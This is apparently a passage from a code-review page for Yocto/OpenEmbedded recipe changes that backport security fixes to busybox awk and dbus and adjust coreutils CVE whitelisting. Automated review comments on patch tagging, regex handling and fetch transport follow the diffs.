56SRC_URI[tarball.md5sum] = "70913edaf2263a157393af07565c17f0" 64SRC_URI[tarball.md5sum] = "70913edaf2263a157393af07565c17f0"
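Review bot: `file://CVE-2021-423xx-awk.patch` is the one new `SRC_URI` entry whose file is added under `meta/recipes-core/busybox/files/` while the other seven patches go to `busybox/busybox/`; the fetcher will presumably find both, but keeping the CVE patches in one directory makes it easier to audit what is applied. Two of the entries (`0001-libbb-sockaddr2str-…` and `0002-nslookup-…`) are `Upstream-Status: Pending`, so there is no upstream commit to compare them against yet. `0001-mktemp-add-tmpdir-option.patch` is a feature patch mixed into a list of security fixes, which is worth saying in the commit message.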
diff --git a/meta/recipes-core/busybox/files/CVE-2021-423xx-awk.patch b/meta/recipes-core/busybox/files/CVE-2021-423xx-awk.patch
new file mode 100644
index 0000000000..7e3d47b88c
--- /dev/null
+++ b/meta/recipes-core/busybox/files/CVE-2021-423xx-awk.patch
@@ -0,0 +1,215 @@
1From a21708eb8d07b4a6dbc1d3e4ace4c5721515a84c Mon Sep 17 00:00:00 2001
2From: Sana Kazi <Sana.Kazi@kpit.com>
3Date: Wed, 8 Dec 2021 12:25:34 +0530
4Subject: [PATCH] busybox: Fix multiple security issues in awk
5
6Description: fix multiple security issues in awk
7Origin: backported awk.c from busybox 1.34.1
8
9CVE: CVE-2021-42378
10CVE: CVE-2021-42379
11CVE: CVE-2021-42380
12CVE: CVE-2021-42381
13CVE: CVE-2021-42382
14CVE: CVE-2021-42384
15CVE: CVE-2021-42385
16CVE: CVE-2021-42386
17
18Upstream-Status: Backport [https://launchpad.net/ubuntu/+archive/primary/+sourcefiles/busybox/1:1.30.1-6ubuntu3.1/busybox_1.30.1-6ubuntu3.1.debian.tar.xz]
19
20Comment: Refreshed first hunk and removed few hunks as they are already present in source.
21
22Signed-off-by: Sana Kazi <Sana.Kazi@kpit.com>
23Signed-off-by: Ranjitsinh Rathod <Ranjitsinh.Rathod@kpit.com>
24
25---
26 editors/awk.c | 80 ++++++++++++++++++++++++++++++++++++++-------------
27 1 file changed, 60 insertions(+), 20 deletions(-)
28
29diff --git a/editors/awk.c b/editors/awk.c
30index d25508e..4e4f282 100644
31--- a/editors/awk.c
32+++ b/editors/awk.c
33@@ -272,7 +272,8 @@ typedef struct tsplitter_s {
34 /* if previous token class is CONCAT1 and next is CONCAT2, concatenation */
35 /* operator is inserted between them */
36 #define TC_CONCAT1 (TC_VARIABLE | TC_ARRTERM | TC_SEQTERM \
37- | TC_STRING | TC_NUMBER | TC_UOPPOST)
38+ | TC_STRING | TC_NUMBER | TC_UOPPOST \
39+ | TC_LENGTH)
40 #define TC_CONCAT2 (TC_OPERAND | TC_UOPPRE)
41
42 #define OF_RES1 0x010000
43@@ -404,7 +405,7 @@ static const char tokenlist[] ALIGN1 =
44
45 #define OC_B OC_BUILTIN
46
47-static const uint32_t tokeninfo[] = {
48+static const uint32_t tokeninfo[] ALIGN4 = {
49 0,
50 0,
51 OC_REGEXP,
52@@ -1070,8 +1071,10 @@ static uint32_t next_token(uint32_t expected)
53 const uint32_t *ti;
54
55 if (t_rollback) {
56+ debug_printf_parse("%s: using rolled-back token\n", __func__);
57 t_rollback = FALSE;
58 } else if (concat_inserted) {
59+ debug_printf_parse("%s: using concat-inserted token\n", __func__);
60 concat_inserted = FALSE;
61 t_tclass = save_tclass;
62 t_info = save_info;
63@@ -1200,7 +1203,11 @@ static uint32_t next_token(uint32_t expected)
64 goto readnext;
65
66 /* insert concatenation operator when needed */
67- if ((ltclass & TC_CONCAT1) && (tc & TC_CONCAT2) && (expected & TC_BINOP)) {
68+ debug_printf_parse("%s: %x %x %x concat_inserted?\n", __func__,
69+ (ltclass & TC_CONCAT1), (tc & TC_CONCAT2), (expected & TC_BINOP));
70+ if ((ltclass & TC_CONCAT1) && (tc & TC_CONCAT2) && (expected & TC_BINOP)
71+ && !(ltclass == TC_LENGTH && tc == TC_SEQSTART) /* but not for "length(..." */
72+ ) {
73 concat_inserted = TRUE;
74 save_tclass = tc;
75 save_info = t_info;
76@@ -1208,6 +1215,7 @@ static uint32_t next_token(uint32_t expected)
77 t_info = OC_CONCAT | SS | P(35);
78 }
79
80+ debug_printf_parse("%s: t_tclass=tc=%x\n", __func__, t_tclass);
81 t_tclass = tc;
82 }
83 ltclass = t_tclass;
84@@ -1218,6 +1226,7 @@ static uint32_t next_token(uint32_t expected)
85 EMSG_UNEXP_EOS : EMSG_UNEXP_TOKEN);
86 }
87
88+ debug_printf_parse("%s: returning, ltclass:%x t_double:%f\n", __func__, ltclass, t_double);
89 return ltclass;
90 #undef concat_inserted
91 #undef save_tclass
92@@ -1282,7 +1291,7 @@ static node *parse_expr(uint32_t iexp)
93 glptr = NULL;
94
95 } else if (tc & (TC_BINOP | TC_UOPPOST)) {
96- debug_printf_parse("%s: TC_BINOP | TC_UOPPOST\n", __func__);
97+ debug_printf_parse("%s: TC_BINOP | TC_UOPPOST tc:%x\n", __func__, tc);
98 /* for binary and postfix-unary operators, jump back over
99 * previous operators with higher priority */
100 vn = cn;
101@@ -1350,8 +1359,10 @@ static node *parse_expr(uint32_t iexp)
102 v = cn->l.v = xzalloc(sizeof(var));
103 if (tc & TC_NUMBER)
104 setvar_i(v, t_double);
105- else
106+ else {
107 setvar_s(v, t_string);
108+ xtc &= ~TC_UOPPOST; /* "str"++ is not allowed */
109+ }
110 break;
111
112 case TC_REGEXP:
113@@ -1387,7 +1398,12 @@ static node *parse_expr(uint32_t iexp)
114
115 case TC_LENGTH:
116 debug_printf_parse("%s: TC_LENGTH\n", __func__);
117- next_token(TC_SEQSTART | TC_OPTERM | TC_GRPTERM);
118+ next_token(TC_SEQSTART /* length(...) */
119+ | TC_OPTERM /* length; (or newline)*/
120+ | TC_GRPTERM /* length } */
121+ | TC_BINOPX /* length <op> NUM */
122+ | TC_COMMA /* print length, 1 */
123+ );
124 rollback_token();
125 if (t_tclass & TC_SEQSTART) {
126 /* It was a "(" token. Handle just like TC_BUILTIN */
127@@ -1747,12 +1763,34 @@ static void fsrealloc(int size)
128 nfields = size;
129 }
130
131+static int regexec1_nonempty(const regex_t *preg, const char *s, regmatch_t pmatch[])
132+{
133+ int r = regexec(preg, s, 1, pmatch, 0);
134+ if (r == 0 && pmatch[0].rm_eo == 0) {
135+ /* For example, happens when FS can match
136+ * an empty string (awk -F ' *'). Logically,
137+ * this should split into one-char fields.
138+ * However, gawk 5.0.1 searches for first
139+ * _non-empty_ separator string match:
140+ */
141+ size_t ofs = 0;
142+ do {
143+ ofs++;
144+ if (!s[ofs])
145+ return REG_NOMATCH;
146+ regexec(preg, s + ofs, 1, pmatch, 0);
147+ } while (pmatch[0].rm_eo == 0);
148+ pmatch[0].rm_so += ofs;
149+ pmatch[0].rm_eo += ofs;
150+ }
151+ return r;
152+}
153+
154 static int awk_split(const char *s, node *spl, char **slist)
155 {
156- int l, n;
157+ int n;
158 char c[4];
159 char *s1;
160- regmatch_t pmatch[2]; // TODO: why [2]? [1] is enough...
161
162 /* in worst case, each char would be a separate field */
163 *slist = s1 = xzalloc(strlen(s) * 2 + 3);
164@@ -1769,29 +1807,31 @@ static int awk_split(const char *s, node *spl, char **slist)
165 return n; /* "": zero fields */
166 n++; /* at least one field will be there */
167 do {
168+ int l;
169+ regmatch_t pmatch[2]; // TODO: why [2]? [1] is enough...
170+
171 l = strcspn(s, c+2); /* len till next NUL or \n */
172- if (regexec(icase ? spl->r.ire : spl->l.re, s, 1, pmatch, 0) == 0
173+ if (regexec1_nonempty(icase ? spl->r.ire : spl->l.re, s, pmatch) == 0
174 && pmatch[0].rm_so <= l
175 ) {
176+ /* if (pmatch[0].rm_eo == 0) ... - impossible */
177 l = pmatch[0].rm_so;
178- if (pmatch[0].rm_eo == 0) {
179- l++;
180- pmatch[0].rm_eo++;
181- }
182 n++; /* we saw yet another delimiter */
183 } else {
184 pmatch[0].rm_eo = l;
185 if (s[l])
186 pmatch[0].rm_eo++;
187 }
188- memcpy(s1, s, l);
189- /* make sure we remove *all* of the separator chars */
190- do {
191- s1[l] = '\0';
192- } while (++l < pmatch[0].rm_eo);
193- nextword(&s1);
194+ s1 = mempcpy(s1, s, l);
195+ *s1++ = '\0';
196 s += pmatch[0].rm_eo;
197 } while (*s);
198+
199+ /* echo a-- | awk -F-- '{ print NF, length($NF), $NF }'
200+ * should print "2 0 ":
201+ */
202+ *s1 = '\0';
203+
204 return n;
205 }
206 if (c[0] == '\0') { /* null split */
207@@ -1995,7 +2035,7 @@ static int ptest(node *pattern)
208 static int awk_getline(rstream *rsm, var *v)
209 {
210 char *b;
211- regmatch_t pmatch[2];
212+ regmatch_t pmatch[2]; // TODO: why [2]? [1] is enough...
213 int size, a, p, pp = 0;
214 int fd, so, eo, r, rp;
215 char c, *m, *s;
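Review bot: In `regexec1_nonempty()` the retry loop calls `regexec(preg, s + ofs, 1, pmatch, 0)` (patch line 146) and ignores its result, then tests `pmatch[0].rm_eo`; when that call does not match, the contents of `pmatch` are not something the code should rely on. Making the failure case explicit keeps the loop's behaviour defined: `if (regexec(preg, s + ofs, 1, pmatch, 0) != 0) pmatch[0].rm_eo = 0;`. The retries also match at `s + ofs` without `REG_NOTBOL`, so a separator pattern anchored with `^` can match in the middle of the record; that may be intended, but deserves a comment. The header lists eight CVEs against one combined patch whose origin is an Ubuntu source tarball, so mapping each CVE to a hunk is not possible from this file.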
diff --git a/meta/recipes-core/coreutils/coreutils_8.31.bb b/meta/recipes-core/coreutils/coreutils_8.31.bb
index 7dd9e41def..3841f71155 100644
--- a/meta/recipes-core/coreutils/coreutils_8.31.bb
+++ b/meta/recipes-core/coreutils/coreutils_8.31.bb
@@ -26,6 +26,10 @@ SRC_URI_append_libc-musl = "file://strtod_fix_clash_with_strtold.patch"
26SRC_URI[md5sum] = "0009a224d8e288e8ec406ef0161f9293" 26SRC_URI[md5sum] = "0009a224d8e288e8ec406ef0161f9293"
27SRC_URI[sha256sum] = "ff7a9c918edce6b4f4b2725e3f9b37b0c4d193531cac49a48b56c4d0d3a9e9fd" 27SRC_URI[sha256sum] = "ff7a9c918edce6b4f4b2725e3f9b37b0c4d193531cac49a48b56c4d0d3a9e9fd"
28 28
29# http://git.savannah.gnu.org/cgit/coreutils.git/commit/?id=v8.27-101-gf5d7c0842
30# runcon is not really a sandbox command, use `runcon ... setsid ...` to avoid this particular issue.
31CVE_CHECK_WHITELIST += "CVE-2016-2781"
32
29EXTRA_OECONF_class-native = "--without-gmp" 33EXTRA_OECONF_class-native = "--without-gmp"
30EXTRA_OECONF_class-target = "--enable-install-program=arch,hostname --libexecdir=${libdir}" 34EXTRA_OECONF_class-target = "--enable-install-program=arch,hostname --libexecdir=${libdir}"
31EXTRA_OECONF_class-nativesdk = "--enable-install-program=arch,hostname" 35EXTRA_OECONF_class-nativesdk = "--enable-install-program=arch,hostname"
@@ -47,6 +51,7 @@ PACKAGECONFIG_class-nativesdk ??= "xattr"
47PACKAGECONFIG[acl] = "--enable-acl,--disable-acl,acl," 51PACKAGECONFIG[acl] = "--enable-acl,--disable-acl,acl,"
48PACKAGECONFIG[xattr] = "--enable-xattr,--disable-xattr,attr," 52PACKAGECONFIG[xattr] = "--enable-xattr,--disable-xattr,attr,"
49PACKAGECONFIG[single-binary] = "--enable-single-binary,--disable-single-binary,," 53PACKAGECONFIG[single-binary] = "--enable-single-binary,--disable-single-binary,,"
54PACKAGECONFIG[openssl] = "--with-openssl=yes,--with-openssl=no,openssl"
50 55
51# [ df mktemp nice printenv base64 gets a special treatment and is not included in this 56# [ df mktemp nice printenv base64 gets a special treatment and is not included in this
52bindir_progs = "arch basename chcon cksum comm csplit cut dir dircolors dirname du \ 57bindir_progs = "arch basename chcon cksum comm csplit cut dir dircolors dirname du \
@@ -202,6 +207,3 @@ do_install_ptest () {
202} 207}
203 208
204FILES_${PN}-ptest += "${bindir}/getlimits" 209FILES_${PN}-ptest += "${bindir}/getlimits"
205
206# These are specific to Opensuse
207CVE_WHITELIST += "CVE-2013-0221 CVE-2013-0222 CVE-2013-0223"
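Review bot: `CVE_CHECK_WHITELIST += "CVE-2016-2781"` (new line 31) silences the scanner for an issue that the comment above it treats as still present in `runcon`, so the comment should say plainly that this is an accepted risk with no code fix, e.g. `# Accepted risk, no code fix: images that ship runcon must call it as 'runcon ... setsid ...'`. The last hunk drops `CVE_WHITELIST += "CVE-2013-0221 CVE-2013-0222 CVE-2013-0223"`; whether those three are still excluded somewhere else is not visible here, so check that they do not reappear in the CVE report. The new `PACKAGECONFIG[openssl]` is unrelated to either CVE change and would be easier to review as its own commit.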
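diff --git a/meta/recipes-core/dbus-wait/dbus-wait_git.bb b/meta/recipes-core/dbus-wait/dbus-wait_git.bb
index c24295b537..b39f7523c0 100644
--- a/meta/recipes-core/dbus-wait/dbus-wait_git.bb
+++ b/meta/recipes-core/dbus-wait/dbus-wait_git.bb
@@ -1,5 +1,6 @@
 SUMMARY = "A simple tool to wait for a specific signal over DBus"
 HOMEPAGE = "http://git.yoctoproject.org/cgit/cgit.cgi/dbus-wait"
+DESCRIPTION = "${SUMMARY}"
 SECTION = "base"
 LICENSE = "GPLv2"
 LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
@@ -10,7 +11,7 @@ SRCREV = "6cc6077a36fe2648a5f993fe7c16c9632f946517"
 PV = "0.1+git${SRCPV}"
 PR = "r2"
 
-SRC_URI = "git://git.yoctoproject.org/${BPN}"
+SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master"
 UPSTREAM_CHECK_COMMITS = "1"
 
 S = "${WORKDIR}/git"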
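Review bot: The new `SRC_URI` on line 14 still uses the plaintext `git://` transport, which gives no server authentication or transport integrity; only the pinned `SRCREV` shown in the second hunk header constrains what is checked out. Since the line is being touched anyway to add `branch=master`, I would set the transport as well, `SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master;protocol=https"`, assuming the server offers HTTPS for this repository.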
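diff --git a/meta/recipes-core/dbus/dbus-test_1.12.16.bb b/meta/recipes-core/dbus/dbus-test_1.12.24.bb
index bea0e74ed0..755c841bad 100644
--- a/meta/recipes-core/dbus/dbus-test_1.12.16.bb
+++ b/meta/recipes-core/dbus/dbus-test_1.12.24.bb
@@ -1,57 +1,31 @@
 SUMMARY = "D-Bus test package (for D-bus functionality testing only)"
 HOMEPAGE = "http://dbus.freedesktop.org"
 SECTION = "base"
-LICENSE = "AFL-2.1 | GPLv2+"
-LIC_FILES_CHKSUM = "file://COPYING;md5=10dded3b58148f3f1fd804b26354af3e \
- file://dbus/dbus.h;beginline=6;endline=20;md5=7755c9d7abccd5dbd25a6a974538bb3c"
 
-DEPENDS = "dbus glib-2.0"
+require dbus.inc
 
-RDEPENDS_${PN}-dev = ""
+SRC_URI += "file://run-ptest \
+ file://python-config.patch \
+ "
 
-SRC_URI = "http://dbus.freedesktop.org/releases/dbus/dbus-${PV}.tar.gz \
- file://tmpdir.patch \
- file://run-ptest \
- file://python-config.patch \
- file://clear-guid_from_server-if-send_negotiate_unix_f.patch \
- "
+DEPENDS = "dbus glib-2.0"
 
-SRC_URI[md5sum] = "2dbeae80dfc9e3632320c6a53d5e8890"
-SRC_URI[sha256sum] = "54a22d2fa42f2eb2a871f32811c6005b531b9613b1b93a0d269b05e7549fec80"
+RDEPENDS_${PN}-dev = ""
 
 S="${WORKDIR}/dbus-${PV}"
 FILESEXTRAPATHS =. "${FILE_DIRNAME}/dbus:"
 
-inherit autotools pkgconfig gettext ptest upstream-version-is-even
+inherit ptest
 
-EXTRA_OECONF_X = "${@bb.utils.contains('DISTRO_FEATURES', 'x11', '--with-x', '--without-x', d)}"
-EXTRA_OECONF_X_class-native = "--without-x"
-
-EXTRA_OECONF = "--enable-tests \
+EXTRA_OECONF += "--enable-tests \
  --enable-modular-tests \
  --enable-installed-tests \
  --enable-checks \
  --enable-asserts \
- --enable-largefile \
- --disable-xml-docs \
- --disable-doxygen-docs \
- --disable-libaudit \
  --with-dbus-test-dir=${PTEST_PATH} \
- ${EXTRA_OECONF_X} \
  --enable-embedded-tests \
  "
 
-EXTRA_OECONF_append_class-target = " SYSTEMCTL=${base_bindir}/systemctl"
-
-PACKAGECONFIG ??= "${@bb.utils.filter('DISTRO_FEATURES', 'systemd x11', d)}"
-PACKAGECONFIG_class-native = ""
-PACKAGECONFIG_class-nativesdk = ""
-
-PACKAGECONFIG[systemd] = "--enable-systemd --with-systemdsystemunitdir=${systemd_system_unitdir},--disable-systemd --without-systemdsystemunitdir,systemd"
-PACKAGECONFIG[x11] = "--with-x --enable-x11-autolaunch,--without-x --disable-x11-autolaunch, virtual/libx11 libsm"
-PACKAGECONFIG[user-session] = "--enable-user-session --with-systemduserunitdir=${systemd_user_unitdir},--disable-user-session"
-PACKAGECONFIG[verbose-mode] = "--enable-verbose-mode,,,"
-
 do_install() {
  :
 }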
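diff --git a/meta/recipes-core/dbus/dbus.inc b/meta/recipes-core/dbus/dbus.inc
new file mode 100644
index 0000000000..9b5cc53d92
--- /dev/null
+++ b/meta/recipes-core/dbus/dbus.inc
@@ -0,0 +1,36 @@
+inherit autotools pkgconfig gettext upstream-version-is-even
+
+LICENSE = "AFL-2.1 | GPLv2+"
+LIC_FILES_CHKSUM = "file://COPYING;md5=10dded3b58148f3f1fd804b26354af3e \
+ file://dbus/dbus.h;beginline=6;endline=20;md5=7755c9d7abccd5dbd25a6a974538bb3c"
+
+SRC_URI = "https://dbus.freedesktop.org/releases/dbus/dbus-${PV}.tar.gz \
+ file://tmpdir.patch \
+ file://dbus-1.init \
+ file://clear-guid_from_server-if-send_negotiate_unix_f.patch \
+ file://CVE-2023-34969.patch \
+"
+
+SRC_URI[sha256sum] = "bc42d196c1756ac520d61bf3ccd6f42013617def45dd1e591a6091abf51dca38"
+
+EXTRA_OECONF = "--disable-xml-docs \
+ --disable-doxygen-docs \
+ --disable-libaudit \
+ --enable-largefile \
+ --with-system-socket=/run/dbus/system_bus_socket \
+ "
+EXTRA_OECONF_append_class-target = " SYSTEMCTL=${base_bindir}/systemctl"
+EXTRA_OECONF_append_class-native = " --disable-selinux"
+
+PACKAGECONFIG ??= "${@bb.utils.filter('DISTRO_FEATURES', 'systemd x11', d)} \
+ user-session \
+ "
+PACKAGECONFIG_class-native = ""
+PACKAGECONFIG_class-nativesdk = ""
+
+PACKAGECONFIG[systemd] = "--enable-systemd --with-systemdsystemunitdir=${systemd_system_unitdir},--disable-systemd --without-systemdsystemunitdir,systemd"
+PACKAGECONFIG[x11] = "--with-x --enable-x11-autolaunch,--without-x --disable-x11-autolaunch, virtual/libx11 libsm"
+PACKAGECONFIG[user-session] = "--enable-user-session --with-systemduserunitdir=${systemd_user_unitdir},--disable-user-session"
+PACKAGECONFIG[verbose-mode] = "--enable-verbose-mode,,,"
+
+CVE_PRODUCT += "d-bus_project:d-bus freedesktop:dbus freedesktop:libdbus"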
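Review bot: `CVE_PRODUCT += ...` on the last line appends instead of assigning, so the product list that CVE scanning ends up with depends on how the default is defined elsewhere, which this file does not show. If the default is a weak `??=` assignment, `+=` discards it and only the three vendor:product pairs are matched; if it is set with `?=` or `=`, the bare recipe name stays in the list too. I would state the intent with a plain assignment, `CVE_PRODUCT = "d-bus_project:d-bus freedesktop:dbus freedesktop:libdbus"`, or keep `+=` and add a comment saying the default name is meant to remain. Because dbus-test now requires this file, the same list applies to the test recipe.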
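diff --git a/meta/recipes-core/dbus/dbus/CVE-2020-12049.patch b/meta/recipes-core/dbus/dbus/CVE-2020-12049.patch
deleted file mode 100644
index ac7a4b7a71..0000000000
--- a/meta/recipes-core/dbus/dbus/CVE-2020-12049.patch
+++ /dev/null
@@ -1,78 +0,0 @@
-From 872b085f12f56da25a2dbd9bd0b2dff31d5aea63 Mon Sep 17 00:00:00 2001
-From: Simon McVittie <smcv@collabora.com>
-Date: Thu, 16 Apr 2020 14:45:11 +0100
-Subject: [PATCH] sysdeps-unix: On MSG_CTRUNC, close the fds we did receive
-
-MSG_CTRUNC indicates that we have received fewer fds that we should
-have done because the buffer was too small, but we were treating it
-as though it indicated that we received *no* fds. If we received any,
-we still have to make sure we close them, otherwise they will be leaked.
-
-On the system bus, if an attacker can induce us to leak fds in this
-way, that's a local denial of service via resource exhaustion.
-
-Reported-by: Kevin Backhouse, GitHub Security Lab
-Fixes: dbus#294
-Fixes: CVE-2020-12049
-Fixes: GHSL-2020-057
-
-Upstream-Status: Backport [https://gitlab.freedesktop.org/dbus/dbus/-/commit/872b085f12f56da25a2dbd9bd0b2dff31d5aea63]
-CVE: CVE-2020-12049
-Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
----
- dbus/dbus-sysdeps-unix.c | 32 ++++++++++++++++++++------------
- 1 file changed, 20 insertions(+), 12 deletions(-)
-
-diff --git a/dbus/dbus-sysdeps-unix.c b/dbus/dbus-sysdeps-unix.c
-index b5fc2466..b176dae1 100644
---- a/dbus/dbus-sysdeps-unix.c
-+++ b/dbus/dbus-sysdeps-unix.c
-@@ -435,18 +435,6 @@ _dbus_read_socket_with_unix_fds (DBusSocket fd,
- struct cmsghdr *cm;
- dbus_bool_t found = FALSE;
-
-- if (m.msg_flags & MSG_CTRUNC)
-- {
-- /* Hmm, apparently the control data was truncated. The bad
-- thing is that we might have completely lost a couple of fds
-- without chance to recover them. Hence let's treat this as a
-- serious error. */
--
-- errno = ENOSPC;
-- _dbus_string_set_length (buffer, start);
-- return -1;
-- }
--
- for (cm = CMSG_FIRSTHDR(&m); cm; cm = CMSG_NXTHDR(&m, cm))
- if (cm->cmsg_level == SOL_SOCKET && cm->cmsg_type == SCM_RIGHTS)
- {
-@@ -501,6 +489,26 @@ _dbus_read_socket_with_unix_fds (DBusSocket fd,
- if (!found)
- *n_fds = 0;
-
-+ if (m.msg_flags & MSG_CTRUNC)
-+ {
-+ unsigned int i;
-+
-+ /* Hmm, apparently the control data was truncated. The bad
-+ thing is that we might have completely lost a couple of fds
-+ without chance to recover them. Hence let's treat this as a
-+ serious error. */
-+
-+ /* We still need to close whatever fds we *did* receive,
-+ * otherwise they'll never get closed. (CVE-2020-12049) */
-+ for (i = 0; i < *n_fds; i++)
-+ close (fds[i]);
-+
-+ *n_fds = 0;
-+ errno = ENOSPC;
-+ _dbus_string_set_length (buffer, start);
-+ return -1;
-+ }
-+
- /* put length back (doesn't actually realloc) */
- _dbus_string_set_length (buffer, start + bytes_read);
-
---
-2.25.1
-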
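diff --git a/meta/recipes-core/dbus/dbus/CVE-2023-34969.patch b/meta/recipes-core/dbus/dbus/CVE-2023-34969.patch
new file mode 100644
index 0000000000..8f29185cf6
--- /dev/null
+++ b/meta/recipes-core/dbus/dbus/CVE-2023-34969.patch
@@ -0,0 +1,96 @@
+From 37a4dc5835731a1f7a81f1b67c45b8dfb556dd1c Mon Sep 17 00:00:00 2001
+From: hongjinghao <q1204531485@163.com>
+Date: Mon, 5 Jun 2023 18:17:06 +0100
+Subject: [PATCH] bus: Assign a serial number for messages from the driver
+
+Normally, it's enough to rely on a message being given a serial number
+by the DBusConnection just before it is actually sent. However, in the
+rare case where the policy blocks the driver from sending a message
+(due to a deny rule or the outgoing message quota being full), we need
+to get a valid serial number sooner, so that we can copy it into the
+DBUS_HEADER_FIELD_REPLY_SERIAL field (which is mandatory) in the error
+message sent to monitors. Otherwise, the dbus-daemon will crash with
+an assertion failure if at least one Monitoring client is attached,
+because zero is not a valid serial number to copy.
+
+This fixes a denial-of-service vulnerability: if a privileged user is
+monitoring the well-known system bus using a Monitoring client like
+dbus-monitor or `busctl monitor`, then an unprivileged user can cause
+denial-of-service by triggering this crash. A mitigation for this
+vulnerability is to avoid attaching Monitoring clients to the system
+bus when they are not needed. If there are no Monitoring clients, then
+the vulnerable code is not reached.
+
+Co-authored-by: Simon McVittie <smcv@collabora.com>
+Resolves: dbus/dbus#457
+(cherry picked from commit b159849e031000d1dbc1ab876b5fc78a3ce9b534)
+---
+ bus/connection.c | 15 +++++++++++++++
+ dbus/dbus-connection-internal.h | 2 ++
+ dbus/dbus-connection.c | 11 ++++++++++-
+ 3 files changed, 27 insertions(+), 1 deletion(-)
+
+diff --git a/bus/connection.c b/bus/connection.c
+index b3583433..215f0230 100644
+--- a/bus/connection.c
++++ b/bus/connection.c
+@@ -2350,6 +2350,21 @@ bus_transaction_send_from_driver (BusTransaction *transaction,
+ if (!dbus_message_set_sender (message, DBUS_SERVICE_DBUS))
+ return FALSE;
+
++ /* Make sure the message has a non-zero serial number, otherwise
++ * bus_transaction_capture_error_reply() will not be able to mock up
++ * a corresponding reply for it. Normally this would be delayed until
++ * the first time we actually send the message out from a
++ * connection, when the transaction is committed, but that's too late
++ * in this case.
++ */
++ if (dbus_message_get_serial (message) == 0)
++ {
++ dbus_uint32_t next_serial;
++
++ next_serial = _dbus_connection_get_next_client_serial (connection);
++ dbus_message_set_serial (message, next_serial);
++ }
++
+ if (bus_connection_is_active (connection))
+ {
+ if (!dbus_message_set_destination (message,
+diff --git a/dbus/dbus-connection-internal.h b/dbus/dbus-connection-internal.h
+index 48357321..ba79b192 100644
+--- a/dbus/dbus-connection-internal.h
++++ b/dbus/dbus-connection-internal.h
+@@ -54,6 +54,8 @@ DBUS_PRIVATE_EXPORT
+ DBusConnection * _dbus_connection_ref_unlocked (DBusConnection *connection);
+ DBUS_PRIVATE_EXPORT
+ void _dbus_connection_unref_unlocked (DBusConnection *connection);
++DBUS_PRIVATE_EXPORT
++dbus_uint32_t _dbus_connection_get_next_client_serial (DBusConnection *connection);
+ void _dbus_connection_queue_received_message_link (DBusConnection *connection,
+ DBusList *link);
+ dbus_bool_t _dbus_connection_has_messages_to_send_unlocked (DBusConnection *connection);
+diff --git a/dbus/dbus-connection.c b/dbus/dbus-connection.c
+index c525b6dc..09cef278 100644
+--- a/dbus/dbus-connection.c
++++ b/dbus/dbus-connection.c
+@@ -1456,7 +1456,16 @@ _dbus_connection_unref_unlocked (DBusConnection *connection)
+ _dbus_connection_last_unref (connection);
+ }
+
+-static dbus_uint32_t
++/**
++ * Allocate and return the next non-zero serial number for outgoing messages.
++ *
++ * This method is only valid to call from single-threaded code, such as
++ * the dbus-daemon, or with the connection lock held.
++ *
++ * @param connection the connection
++ * @returns A suitable serial number for the next message to be sent on the connection.
++ */
++dbus_uint32_t
+ _dbus_connection_get_next_client_serial (DBusConnection *connection)
+ {
+ dbus_uint32_t serial;
+--
+2.25.1
+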
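Review bot: The patch header (lines 1–26 of the new file) carries neither a `CVE:` nor an `Upstream-Status:` tag, and no sign-off from whoever did the backport, unlike the other backports on this page (CVE-2020-12049.patch, CVE-2020-36254.patch, CVE-2021-36369.patch). Without the `CVE:` tag, any tooling that marks the issue as fixed presumably has only the file name to go on, and the provenance of the change is recorded only in the free-text cherry-pick line. I would add `CVE: CVE-2023-34969` and `Upstream-Status: Backport [<upstream commit URL>]` above the `---` separator, pointing at the commit the cherry-pick line already names, plus a `Signed-off-by:` for the backporter.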
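diff --git a/meta/recipes-core/dbus/dbus_1.12.16.bb b/meta/recipes-core/dbus/dbus_1.12.24.bb
index 10d1b34448..cf6f7dc0ef 100644
--- a/meta/recipes-core/dbus/dbus_1.12.16.bb
+++ b/meta/recipes-core/dbus/dbus_1.12.24.bb
@@ -2,9 +2,9 @@ SUMMARY = "D-Bus message bus"
 DESCRIPTION = "D-Bus is a message bus system, a simple way for applications to talk to one another. In addition to interprocess communication, D-Bus helps coordinate process lifecycle; it makes it simple and reliable to code a \"single instance\" application or daemon, and to launch applications and daemons on demand when their services are needed."
 HOMEPAGE = "https://dbus.freedesktop.org"
 SECTION = "base"
-LICENSE = "AFL-2.1 | GPLv2+"
-LIC_FILES_CHKSUM = "file://COPYING;md5=10dded3b58148f3f1fd804b26354af3e \
- file://dbus/dbus.h;beginline=6;endline=20;md5=7755c9d7abccd5dbd25a6a974538bb3c"
+
+require dbus.inc
+
 DEPENDS = "expat virtual/libintl autoconf-archive"
 RDEPENDS_dbus_class-native = ""
 RDEPENDS_dbus_class-nativesdk = ""
@@ -12,17 +12,7 @@ PACKAGES += "${@bb.utils.contains('DISTRO_FEATURES', 'ptest', '${PN}-ptest', '',
 ALLOW_EMPTY_dbus-ptest = "1"
 RDEPENDS_dbus-ptest_class-target = "dbus-test-ptest"
 
-SRC_URI = "https://dbus.freedesktop.org/releases/dbus/dbus-${PV}.tar.gz \
- file://tmpdir.patch \
- file://dbus-1.init \
- file://clear-guid_from_server-if-send_negotiate_unix_f.patch \
- file://CVE-2020-12049.patch \
-"
-
-SRC_URI[md5sum] = "2dbeae80dfc9e3632320c6a53d5e8890"
-SRC_URI[sha256sum] = "54a22d2fa42f2eb2a871f32811c6005b531b9613b1b93a0d269b05e7549fec80"
-
-inherit useradd autotools pkgconfig gettext update-rc.d upstream-version-is-even
+inherit useradd update-rc.d
 
 INITSCRIPT_NAME = "dbus-1"
 INITSCRIPT_PARAMS = "start 02 5 3 2 . stop 20 0 1 6 ."
@@ -93,27 +83,7 @@ pkg_postinst_dbus() {
 }
 
 
-EXTRA_OECONF = "--disable-tests \
- --disable-xml-docs \
- --disable-doxygen-docs \
- --disable-libaudit \
- --enable-largefile \
- --with-system-socket=/run/dbus/system_bus_socket \
- "
-
-EXTRA_OECONF_append_class-target = " SYSTEMCTL=${base_bindir}/systemctl"
-EXTRA_OECONF_append_class-native = " --disable-selinux"
-
-PACKAGECONFIG ??= "${@bb.utils.filter('DISTRO_FEATURES', 'systemd x11', d)} \
- user-session \
- "
-
-PACKAGECONFIG_class-native = ""
-PACKAGECONFIG_class-nativesdk = ""
-
-PACKAGECONFIG[systemd] = "--enable-systemd --with-systemdsystemunitdir=${systemd_system_unitdir},--disable-systemd --without-systemdsystemunitdir,systemd"
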